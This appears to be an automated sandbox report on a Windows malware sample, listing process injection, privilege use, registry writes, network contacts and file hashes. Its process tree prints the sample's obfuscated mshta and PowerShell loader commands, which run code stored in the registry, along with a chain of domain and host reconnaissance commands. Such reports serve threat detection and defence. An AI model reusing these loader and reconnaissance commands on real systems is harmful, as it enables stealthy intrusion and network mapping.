Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4fbddba7-5cb2-42b6- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6b80ac69-96fc-4319- = "0" C:\Windows\System32\RuntimeBroker.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\RuntimeBroker.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\RuntimeBroker.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 428 wrote to memory of 4556 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 428 wrote to memory of 4556 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 428 wrote to memory of 4556 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2216 wrote to memory of 4384 N/A C:\Windows\System32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2216 wrote to memory of 4384 N/A C:\Windows\System32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4384 wrote to memory of 4108 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 4384 wrote to memory of 4108 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 4108 wrote to memory of 3796 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 4108 wrote to memory of 3796 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 4384 wrote to memory of 3116 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 4384 wrote to memory of 3116 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 3116 wrote to memory of 3580 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 3116 wrote to memory of 3580 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 4384 wrote to memory of 2648 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 4384 wrote to memory of 2648 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 4384 wrote to memory of 2648 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 4384 wrote to memory of 2648 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 2648 wrote to memory of 3444 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2648 wrote to memory of 3444 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2648 wrote to memory of 3444 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2648 wrote to memory of 3444 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2648 wrote to memory of 3788 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2648 wrote to memory of 3788 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2648 wrote to memory of 3788 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2648 wrote to memory of 3788 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2648 wrote to memory of 4408 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2648 wrote to memory of 4408 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2648 wrote to memory of 4408 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2648 wrote to memory of 4408 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2648 wrote to memory of 5096 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2648 wrote to memory of 5096 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2648 wrote to memory of 5096 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2648 wrote to memory of 5096 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2648 wrote to memory of 4292 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 2648 wrote to memory of 4292 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 2648 wrote to memory of 5000 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 2648 wrote to memory of 5000 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 2648 wrote to memory of 5000 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 2648 wrote to memory of 5000 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 4292 wrote to memory of 5064 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4292 wrote to memory of 5064 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4292 wrote to memory of 852 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\more.com
PID 4292 wrote to memory of 852 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\more.com
PID 2648 wrote to memory of 5000 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 2648 wrote to memory of 5000 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 2648 wrote to memory of 1984 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 2648 wrote to memory of 1984 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 2648 wrote to memory of 5060 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 2648 wrote to memory of 5060 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 5060 wrote to memory of 384 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 5060 wrote to memory of 384 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 2648 wrote to memory of 656 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 2648 wrote to memory of 656 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 2648 wrote to memory of 612 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 2648 wrote to memory of 612 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 612 wrote to memory of 4836 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 612 wrote to memory of 4836 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2648 wrote to memory of 2040 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 2648 wrote to memory of 2040 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 2648 wrote to memory of 616 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 2648 wrote to memory of 616 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 616 wrote to memory of 4508 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\nslookup.exe
PID 616 wrote to memory of 4508 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\nslookup.exe
PID 2648 wrote to memory of 4624 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe

Processes

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\62ea3f935563b.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\62ea3f935563b.dll

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ytyk='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ytyk).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\8A2718CF-61F1-4CDB-3B5E-25409F722974\\\ManagerMemory'));if(!window.flag)close()</script>"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name idjndxe -value gp; new-alias -name bifqcj -value iex; bifqcj ([System.Text.Encoding]::ASCII.GetString((idjndxe "HKCU:Software\AppDataLow\Software\Microsoft\8A2718CF-61F1-4CDB-3B5E-25409F722974").ProcessOptions))

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\l3z4y1p4\l3z4y1p4.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7F03.tmp" "c:\Users\Admin\AppData\Local\Temp\l3z4y1p4\CSCD5E2C973230047EB9396AC76FA5C35C8.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gonep1pl\gonep1pl.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7F80.tmp" "c:\Users\Admin\AppData\Local\Temp\gonep1pl\CSCD127D4C758CE4227BCC828CF19FCFE9.TMP"

C:\Windows\system32\cmd.exe

cmd /C "wmic computersystem get domain |more > C:\Users\Admin\AppData\Local\Temp\C850.bin1"

C:\Windows\syswow64\cmd.exe

"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,

C:\Windows\system32\more.com

more

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get domain

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"

C:\Windows\system32\systeminfo.exe

systeminfo.exe

C:\Windows\system32\cmd.exe

cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\C850.bin1"

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"

C:\Windows\system32\net.exe

net view

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"

C:\Windows\system32\cmd.exe

cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"

C:\Windows\system32\nslookup.exe

nslookup 127.0.0.1

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"

C:\Windows\system32\cmd.exe

cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"

C:\Windows\system32\tasklist.exe

tasklist.exe /SVC

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"

C:\Windows\system32\cmd.exe

cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"

C:\Windows\system32\driverquery.exe

driverquery.exe

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"

C:\Windows\system32\cmd.exe

cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"

C:\Windows\system32\reg.exe

reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"

C:\Windows\system32\net.exe

net config workstation

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 config workstation

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"

C:\Windows\system32\cmd.exe

cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"

C:\Windows\system32\nltest.exe

nltest /domain_trusts

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"

C:\Windows\system32\cmd.exe

cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"

C:\Windows\system32\nltest.exe

nltest /domain_trusts /all_trusts

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"

C:\Windows\system32\net.exe

net view /all /domain

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"

C:\Windows\system32\net.exe

net view /all

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"

C:\Windows\system32\cmd.exe

cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\C850.bin1 > C:\Users\Admin\AppData\Local\Temp\C850.bin & del C:\Users\Admin\AppData\Local\Temp\C850.bin1"

Network

Country Destination Domain Proto
US 209.197.3.8:80 tcp
US 20.189.173.11:443 tcp
US 13.107.42.16:80 config.edge.skype.com tcp
US 93.184.221.240:80 tcp
US 209.197.3.8:80 tcp
RO 37.120.206.71:80 37.120.206.71 tcp
US 204.79.197.203:80 tcp
RU 5.42.199.72:80 5.42.199.72 tcp
RO 37.120.206.91:80 37.120.206.91 tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 1.0.0.127.in-addr.arpa udp

Files

memory/4556-130-0x0000000000000000-mapping.dmp

memory/4556-131-0x0000000010000000-0x000000001000E000-memory.dmp

memory/4556-136-0x00000000015A0000-0x00000000015AD000-memory.dmp

memory/4384-140-0x0000000000000000-mapping.dmp

memory/4384-141-0x000001AF40A30000-0x000001AF40A52000-memory.dmp

memory/4384-142-0x00007FFE88110000-0x00007FFE88BD1000-memory.dmp

memory/4108-143-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\l3z4y1p4\l3z4y1p4.cmdline

MD5 857aefc206e63debbae5504d0f213632
SHA1 fc39ba707407a0cf88f36039cf3d00e758c335d7
SHA256 f9fe954f217605799e4d4b0d1ecf5f048b7a087416def84fb5ff2ac460939de1
SHA512 9502234b553da9fcf25b7d4089947aedc19eeb86114efbb67900b1cce5d37be9479593caaa733d739078c32b4e16e6d4d075ba8bd414c9f4d4be52238defdf96

\??\c:\Users\Admin\AppData\Local\Temp\l3z4y1p4\l3z4y1p4.0.cs

MD5 9a10482acb9e6952b96f4efc24d9d783
SHA1 5cfc9bf668351df25fcda98c3c2d0bb056c026c3
SHA256 a0424e1530f002761a882c19c22504153a5e86d7fbb41391e940452bfa15f377
SHA512 e932914ad99d7bd39561e020d1e8c1f4e175c16eae66df720100c65e40ccc3383b5145f703432885f3f1ce080e8a4feb045ddd5c8bbc2f3231c619d04182ac28

memory/3796-146-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\l3z4y1p4\CSCD5E2C973230047EB9396AC76FA5C35C8.TMP

MD5 4e155fb1f268acea23442266fa8c4cf3
SHA1 cb4dc2af42c4266dbbf55b5dc1135b51e3586d28
SHA256 e5b9cd9a3318ad01f7c89ffe770a17c1ebd206dff950943fa7b463ee76e166f9
SHA512 ae27fdfbdf04fb2de3f473a078e3154caf8f2d0f277f0ef9e149f6b8e517e27d5e9cb83dc8f726261ff91acd2657300e3f1c099e49fb173c56fdbdb0dae8f999

C:\Users\Admin\AppData\Local\Temp\RES7F03.tmp

MD5 dec1e106b9bd42ff76dcca48a4647c7f
SHA1 700c079453dddae9cb51e6048056e21f3a29f8b7
SHA256 675f5b7af3c3be845e7b1f5b1fb3f8ba16370e7400e3151c15722e85185e4b06
SHA512 3293dc2110074e5913d19e7f1737c384eceeb12f46d98f39ce0171dbe97e6777c2aa587a32db7eb87c4ae4df1fe3e789b18b538e9f26ce2d2662520e8e403f70

memory/3116-150-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\l3z4y1p4\l3z4y1p4.dll

MD5 b8c0cd5cece832852d7ca26c0f7ddabe
SHA1 8cf07785708a754cedd67107652c879da7322de0
SHA256 fda0200dcb3dc7ca5cbe804ef38af5e32a19a992a1574fd36d5b3443b19be0f2
SHA512 d493faea775f560243423cfaf1c2bd56902276fed3e6a6d4c68ee99f4cc5653a99ffbb8faf48efed729013bd436cdb27aead31ba3a7aaa34ec0bbd8b05310842

\??\c:\Users\Admin\AppData\Local\Temp\gonep1pl\gonep1pl.0.cs

MD5 aca9704199c51fde14b8bf8165bc2a4c
SHA1 789b408ccad29240bd093515cbd19a199ad2c1c8
SHA256 cb3da8a9768252634f8ed4c62e026dc8217b055e00f11b6012a52ed130c92c27
SHA512 a8c1df598581f508ecbf1e516744f11abfb71ec6bb9895d0b61f15e70e56e27cb40b4e5395b9411b787f8bb4f264ca704d815260677909dc1e599d601d0b5de6

\??\c:\Users\Admin\AppData\Local\Temp\gonep1pl\gonep1pl.cmdline

MD5 a12dbc03083c923b91f0ae5e81c0fa65
SHA1 2e75e9e5e1bfc1a941ba7fed967b1058f5e0f4b1
SHA256 d2b3d6b1ca5ec7600b844f6108ec1da5367895c8f6bfcc9de580f4a30346b4b9
SHA512 7a65f3c48de859102d6725b7093ab38bfd2edb9737be999f926e04fd96a90a934fb162290e32b8d7e3ec267f1374e7b2623060637d419b18778f00a637971762

\??\c:\Users\Admin\AppData\Local\Temp\gonep1pl\CSCD127D4C758CE4227BCC828CF19FCFE9.TMP

MD5 146183315847259526b776f4e05702d4
SHA1 9c16126b9c80ce0a775dd0e2b1b6a42c2f817b6d
SHA256 9176550073b3105d0fbf6cf246ae7b244289943b5230d1315d6daf26d2c955f7
SHA512 2cc4cdaf3330fb058782c880eec0b8e49712ae3cd5f199a8f892ddde20fc7ec165ba3f9a7c5e83e5ae0aa1cf8edbe0dfab421ada3084c41a5942157f494f04d8

memory/3580-153-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\RES7F80.tmp

MD5 99f16ff1da7e804feb5e04290e668d40
SHA1 416ad9642d6bff1e68deb308ad4b912007173636
SHA256 be6a979c37f0e67a6ca68b41264c5260fa322ff4b64501457f13c221e93d8609
SHA512 0fe14f6280f4a1bbbf65374e8afcb0670185366cd9ba4d174dee47a4293d9b5d73ef90a42282d61fba1aad99bfadfe7c6493f4042daf3288a22178c856ecd297

C:\Users\Admin\AppData\Local\Temp\gonep1pl\gonep1pl.dll

MD5 777821e762608d2478554cc466301fd4
SHA1 4b5a0f3721d809984415ea2690f802582aa00633
SHA256 0396723ec1105c30f3f49c7a802a39fd9ac6c5c425c9ee5424c093172ebee0af
SHA512 28166ca3e093a667b55a802fbe0f9f695810aeebf7c33f1938f0827b1c5c39eefb628541bdd1fe3e5ce1c05004dddcdcb06dcc08548cecdde51c548d316d4800

memory/4384-157-0x000001AF40AA0000-0x000001AF40ADD000-memory.dmp

memory/2648-158-0x0000000008670000-0x0000000008713000-memory.dmp

memory/4384-159-0x00007FFE88110000-0x00007FFE88BD1000-memory.dmp

memory/4292-160-0x0000000000000000-mapping.dmp

memory/5000-161-0x0000000000000000-mapping.dmp

memory/5064-162-0x0000000000000000-mapping.dmp

memory/852-163-0x0000000000000000-mapping.dmp

